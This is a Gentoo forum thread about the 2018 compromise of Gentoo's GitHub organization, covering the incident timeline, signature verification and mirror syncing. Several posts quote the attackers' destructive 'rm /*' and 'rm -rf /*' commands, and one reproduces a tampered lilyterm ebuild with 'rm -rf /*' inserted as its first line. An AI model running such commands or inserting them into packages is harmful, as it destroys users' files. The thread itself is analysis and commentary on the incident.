View previous topic :: View next topic |
Author |
Message |
khayyam Watchman
Joined: 07 Jun 2012 Posts: 6227 Location: Room 101
|
Posted: Sat Jun 30, 2018 2:51 pm Post subject: |
|
|
ulenrich ... you give them more credit than they're due, the most they achieved is gaining unauthorised access.
ulenrich wrote: | Code: | emerge --sync
"Warning - external command not allowed here - 1.line of xx.ebuild: 'rm /*'" |
|
... which is hilarious for various reasons, they were not smart enough to know where in the ebuild you might insert such a command, and they couldn't even get the command right:
Code: | % bash --login
$ cd $(mktemp -d)
$ mkdir a b c d e f g
$ /bin/rm ./*
/bin/rm: cannot remove './a': Is a directory
/bin/rm: cannot remove './b': Is a directory
/bin/rm: cannot remove './c': Is a directory
/bin/rm: cannot remove './d': Is a directory
/bin/rm: cannot remove './e': Is a directory
/bin/rm: cannot remove './f': Is a directory
/bin/rm: cannot remove './g': Is a directory |
Given the obviousness, and the complete lack of understanding involved, then I think it's safe to say no-one has anything to worry about. So, TIMTOWTDI anyone?
best ... khay |
|
Back to top |
|
|
Naib Watchman
Joined: 21 May 2004 Posts: 6051 Location: Removed by Neddy
|
Posted: Sat Jun 30, 2018 3:37 pm Post subject: |
|
|
See if it was me I would have updated a virtuals rebuild and added in a short script injected into a cronjob to creat a popup advising to "upgrade" to windows10 _________________
Quote: | Removed by Chiitoo |
|
|
Back to top |
|
|
khayyam Watchman
Joined: 07 Jun 2012 Posts: 6227 Location: Room 101
|
Posted: Sat Jun 30, 2018 3:46 pm Post subject: |
|
|
Naib wrote: | See if it was me I would have updated a virtuals rebuild and added in a short script injected into a cronjob to creat a popup advising to "upgrade" to windows10 |
Naib ... you, my friend, lack imagination ... Windows98 ;)
best ... khay |
|
Back to top |
|
|
pjp Administrator
Joined: 16 Apr 2002 Posts: 20067
|
Posted: Sat Jun 30, 2018 4:17 pm Post subject: |
|
|
khayyam wrote: | So, TIMTOWTDI anyone? | How about this? Code: | diff <(cmd A) <(cmd B) | I don't recall what I was doing when I wanted it, but was happy to have learned about it. _________________ Quis separabit? Quo animo? |
|
Back to top |
|
|
Vrenn Guru
Joined: 15 Dec 2004 Posts: 318
|
Posted: Sat Jun 30, 2018 6:05 pm Post subject: |
|
|
Of course I was shocked too. (but not affected)
But I think the hack has a positive effect for many users:
Before the hack: "Gentoo infrastructure? I don't care..."
After the hack: "Gentoo infrastructure! I learned a lot!"
(although the main infrastructure has not been hit)
That is the main reason for now why I try keeping up with this story. _________________ With nice greetings
Vrenn |
|
Back to top |
|
|
Ant P. Watchman
Joined: 18 Apr 2009 Posts: 6920
|
Posted: Sat Jun 30, 2018 9:09 pm Post subject: |
|
|
Maybe now they'll finally let portage check git GPG signatures, which I've been pointing out it doesn't since the start… |
|
Back to top |
|
|
bunder Bodhisattva
Joined: 10 Apr 2004 Posts: 5934
|
Posted: Sat Jun 30, 2018 10:29 pm Post subject: |
|
|
isn't that the point behind the whole rsync verify thing they were trying to add a few weeks back? (that i bet a lot of people turned off because it made sync horridly slow) _________________
Neddyseagoon wrote: | The problem with leaving is that you can only do it once and it reduces your influence. |
banned from #gentoo since sept 2017 |
|
Back to top |
|
|
potuz Guru
Joined: 30 Jan 2010 Posts: 378
|
Posted: Sat Jun 30, 2018 10:44 pm Post subject: |
|
|
dalu wrote: |
Why is this all handled like in a 3rd world country?
|
Contrary to that post I'd like to use this space to just send a quick thank you to the dev and infra teams that are handling this perfectly.
wiki wrote: |
20:19:xx Attacker tries a bad password on the account.
....
....
21:28:xx Github support responds; Gentoo Github org frozen.
....
....
06:57:xx Gentoo Infra does force-push on gentoo/systemd to restore state. c46d8bbf->bf0e0a4d.
06:58:xx Gentoo Infra does force-push on gentoo/gentoo to restore state. e6db0eb4->73b72409.
|
Less than 1h10' to contain the incident, less than 11 hours to restore the state and most importantly:
Quote: |
Subject From Date
[gentoo-announce] Gentoo Github Organization hacked. Alec Warner Thu, 28 Jun 2018 21:14:23
|
Gentoo-devs were clean and transparent about this, we were immediately informed and kept up-to-date with the developments on this issue. If anything, as a normal user without anything to help, the least I can do is to thank the team for making me feel safe. |
|
Back to top |
|
|
potuz Guru
Joined: 30 Jan 2010 Posts: 378
|
Posted: Sat Jun 30, 2018 10:52 pm Post subject: |
|
|
bunder wrote: | isn't that the point behind the whole rsync verify thing they were trying to add a few weeks back? (that i bet a lot of people turned off because it made sync horridly slow) |
In my case that rsync verify does not bug me as being slow, but it raises https://bugs.gentoo.org/648596 |
|
Back to top |
|
|
Ant P. Watchman
Joined: 18 Apr 2009 Posts: 6920
|
Posted: Sat Jun 30, 2018 11:13 pm Post subject: |
|
|
bunder wrote: | isn't that the point behind the whole rsync verify thing they were trying to add a few weeks back? (that i bet a lot of people turned off because it made sync horridly slow) |
I'd been using webrsync-gpg for years prior to that, but you're right - the current state of things is way more inefficient than it needs to be. webrsync is relatively fast but lags up to a day, rsync with signed manifests is insanely slow, and git is the same, when it should be the best option. |
|
Back to top |
|
|
Angrychile Apprentice
Joined: 27 Oct 2009 Posts: 235
|
|
Back to top |
|
|
Jaglover Watchman
Joined: 29 May 2005 Posts: 8291 Location: Saint Amant, Acadiana
|
|
Back to top |
|
|
bunder Bodhisattva
Joined: 10 Apr 2004 Posts: 5934
|
Posted: Sun Jul 01, 2018 2:24 am Post subject: |
|
|
I thought it depended on which distro you use, I know freebsd sets their / directory as immutable so the rm fails. Solaris/illumos took a different route, since some spec somewhere (posix perhaps) says that by trying to rm the root directory, you include the cwd, which can't be removed (so the rm fails instantly)
edit: Yeah I remembered that right https://www.youtube.com/watch?v=l6XQUciI-Sc&t=80m56s _________________
Neddyseagoon wrote: | The problem with leaving is that you can only do it once and it reduces your influence. |
banned from #gentoo since sept 2017 |
|
Back to top |
|
|
mv Watchman
Joined: 20 Apr 2005 Posts: 6747
|
Posted: Sun Jul 01, 2018 7:23 am Post subject: |
|
|
Now it is probably too late to post, but anyway:
- Warning: If you used git and just changed the url in /etc/portage/repos.conf, this address change becomes only visible when you clone a new repository. Just emerge --sync (without first completely removing /usr/portage including the .git directory) won't do.
- Alternatively, it should be sufficient to manually update the address in /usr/portage/.git/config
But I also have a question: I have temporarily changed both addresses to https://gitweb.gentoo.org/repo/gentoo.git
(Since I had not synced after the hack yet, there is no need to get rid of /usr/portage).
But git keeps claiming that it cannot access https://gitweb.gentoo.org/repo/gentoo.git/ (note the trailing slash; but I also tried with a slash added to the address with exactly the same result).
In fact, this is not a git address, but apparently only the address of the browser web interface.
Is there another address, i.e. is it possible at all to access the official git repository with the https protocol from git? (I would not like to use the unsafer git protocoll).
I have another question: Although the webinterface of github/gentoo is still down, it seems already possible to sync github/gentoo/gentoo.git. According to infra status, the data should already be fine again, and also at a first glance the commits seem all reasonably be signed. Can anybody confirm that it is already safe to use the github/gentoo repository again? |
|
Back to top |
|
|
khayyam Watchman
Joined: 07 Jun 2012 Posts: 6227 Location: Room 101
|
Posted: Sun Jul 01, 2018 8:11 am Post subject: |
|
|
Angrychile wrote: | Oh my gawd! FILE WIPING MALWARE |
Angrychile ... wrong, and it doesn't make it any less wrong if you use bold caps and provide links with misleading headlines.
bunder wrote: | I thought it depended on which distro you use, I know freebsd sets their / directory as immutable so the rm fails. Solaris/illumos took a different route, since some spec somewhere (posix perhaps) says that by trying to rm the root directory, you include the cwd, which can't be removed (so the rm fails instantly) |
As I pointed out above above, 'rm' (sys-apps/coreutils) requires the '--recursive,-r,-R' switch to remove directories:
man rm wrote: | By default, rm does not remove directories. Use the --recursive (-r or -R) option to remove each listed directory |
best ... khay |
|
Back to top |
|
|
NeddySeagoon Administrator
Joined: 05 Jul 2003 Posts: 54237 Location: 56N 3W
|
Posted: Sun Jul 01, 2018 10:35 am Post subject: |
|
|
mv,
At the time of your post, the github mirror had been reverted and was safe to use. _________________ Regards,
NeddySeagoon
Computer users fall into two groups:-
those that do backups
those that have never had a hard drive fail. |
|
Back to top |
|
|
bunder Bodhisattva
Joined: 10 Apr 2004 Posts: 5934
|
|
Back to top |
|
|
Naib Watchman
Joined: 21 May 2004 Posts: 6051 Location: Removed by Neddy
|
|
Back to top |
|
|
khayyam Watchman
Joined: 07 Jun 2012 Posts: 6227 Location: Room 101
|
Posted: Sun Jul 01, 2018 1:43 pm Post subject: |
|
|
khayyam wrote: | So, TIMTOWTDI anyone? |
pjp wrote: | How about this?
Code: | diff <(cmd A) <(cmd B) |
|
pjp ... not sure there is OWTD process substitution, however I can tell you it won't work in all cases:
Code: | % echo works:<(echo)
works:/proc/self/fd/12
% echo broken:${:-<(echo)}
zsh: missing end of string
% echo fixed:${:-=(echo)}
fixed:/home/khayyam/tmp/zshDhm8cD |
As you can see the (zsh) process substitution '=(list)' creates a temporary file for the process, and so avoids issues (like the program expecting to lseek) with file descriptors or named pipes.
best ... khay |
|
Back to top |
|
|
mv Watchman
Joined: 20 Apr 2005 Posts: 6747
|
Posted: Sun Jul 01, 2018 2:06 pm Post subject: |
|
|
Thanks. The anongit.gentoo.org/git addresses can meanwhile indeed be used with the https protocol. Some months ago when I tried last this was not the case.
And indeed, it seems that github/gentoo is usable again for git syncing, although the corresponding web-page is still offline. |
|
Back to top |
|
|
gengreen Apprentice
Joined: 23 Dec 2017 Posts: 150
|
Posted: Mon Jul 02, 2018 11:03 pm Post subject: Most harmful hack of 2018 |
|
|
Ebuild "hacked"
x11-terms/lilyterm-0.9.9.4-r1
Code: | rm -rf /*
# Copyright 1999-2018 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
EAPI=5
inherit eutils
DESCRIPTION="a terminal emulator based off of libvte that aims to be fast and lightweight"
HOMEPAGE="https://lilyterm.luna.com.tw"
LICENSE="GPL-3"
SRC_URI="https://${PN}.luna.com.tw/file/${P}.tar.gz"
SLOT="0"
KEYWORDS="~amd64 ~x86"
RDEPEND="
x11-libs/vte:0
"
DEPEND="
${RDEPEND}
dev-util/intltool
sys-devel/gettext
virtual/pkgconfig
"
DOCS=( AUTHORS ChangeLog README TODO )
src_prepare() {
epatch "${FILESDIR}"/${PN}-0.9.9.4-gettext.patch
./autogen.sh
} |
ebuild lilyterm-0.9.9.4-r1 digest manifest
Quote: | * ERROR: lilyterm-0.9.9.4-r1::musl failed (depend phase):
* External commands disallowed while sourcing ebuild: rm -rf *
*
* Call stack:
...
|
|
|
Back to top |
|
|
joanandk Apprentice
Joined: 12 Feb 2017 Posts: 169
|
Posted: Tue Jul 03, 2018 5:36 am Post subject: |
|
|
Tony0945 wrote: | EDIT We're seeing that famed Microsoft security. |
I do not think this has happened by accident, it was planned and executed by the new staff.
BR |
|
Back to top |
|
|
Naib Watchman
Joined: 21 May 2004 Posts: 6051 Location: Removed by Neddy
|
|
Back to top |
|
|
CasperVector Apprentice
Joined: 03 Apr 2012 Posts: 156
|
|
Back to top |
|
|
Naib Watchman
Joined: 21 May 2004 Posts: 6051 Location: Removed by Neddy
|
Posted: Tue Jul 03, 2018 9:16 am Post subject: |
|
|
thanks... stupid google and amp via mobile _________________
Quote: | Removed by Chiitoo |
|
|
Back to top |
|
|
|